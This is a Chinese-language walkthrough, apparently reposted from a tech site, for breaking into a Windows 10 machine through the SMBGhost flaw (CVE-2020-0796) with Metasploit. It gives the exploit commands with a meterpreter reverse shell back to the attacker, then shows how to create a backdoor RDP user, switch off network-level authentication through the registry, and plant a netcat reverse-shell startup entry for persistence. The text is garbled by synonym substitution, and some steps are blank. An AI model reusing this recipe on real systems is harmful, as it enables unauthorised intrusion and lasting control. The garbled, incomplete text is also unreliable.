以下是利用永恒之黑漏洞对Windows 10举行渗透测试的步骤:
环境介绍
- 靶机:IP地址为192.168.1.60,运行Windows 10 1903版本。
- 攻击机:IP地址为192.168.1.53。
靶机准备
- 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
- 检查体系补丁:确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
- 开启445端口:确保靶机的445端口(SMB协议)是开放的。
获取Shell
- 利用Metasploit框架:
- 启动Metasploit:msfconsole。
- 利用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost。
- 设置选项:
- 显示模块选项:show options。
- 设置目标主机IP:set RHOSTS 192.168.1.60。
- 设置payload:set payload windows/x64/meterpreter/reverse_tcp。
- 设置攻击机监听IP:set LHOST 192.168.1.53。
- 禁用模仿模式:set DefangedMode false。
- 执行exploit:
创建新用户并开启远程桌面
- 开启RDP远程桌面:
- 利用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
- 创建RDP用户:
- 设置用户名和密码:set username xuegod 和 set password 123456。
- 指定会话ID:set session 1。
- 运行模块:run。
- 检查NLA设置:
- 查询注册表以确定是否开启网络级身份验证(NLA)。
- 关闭NLA(假如开启):
- 修改注册表值SecurityLayer和UserAuthentication为0,以允许非NLA的RDP毗连。
- 毗连远程桌面:
- 在Kali上利用rdesktop下令毗连到靶机的远程桌面:rdesktop 192.168.1.60。
开启后门维持权限访问
- 配置后门程序:
- 上传nc(Netcat)到Windows 10体系。
- 修改注册表添加启动项,以便在体系启动时执行nc反弹shell下令。
- 设置防火墙规则:
- 重启Windows 10:
- 毗连后门:
- 在Kali上利用nc下令毗连后门:nc -v 192.168.1.60 443。
- MSF控制台毗连(可选):
- 在Metasploit框架中利用connect下令毗连到后门:connect 192.168.1.60 443。
总结
- 文档提供了利用永恒之黑漏洞对Windows 10举行渗透的具体步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。
请注意,这些步骤仅供教诲目标,实际操作应在授权的渗透测试和安全研究环境中举行。未经授权的渗透测试大概违反法律。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
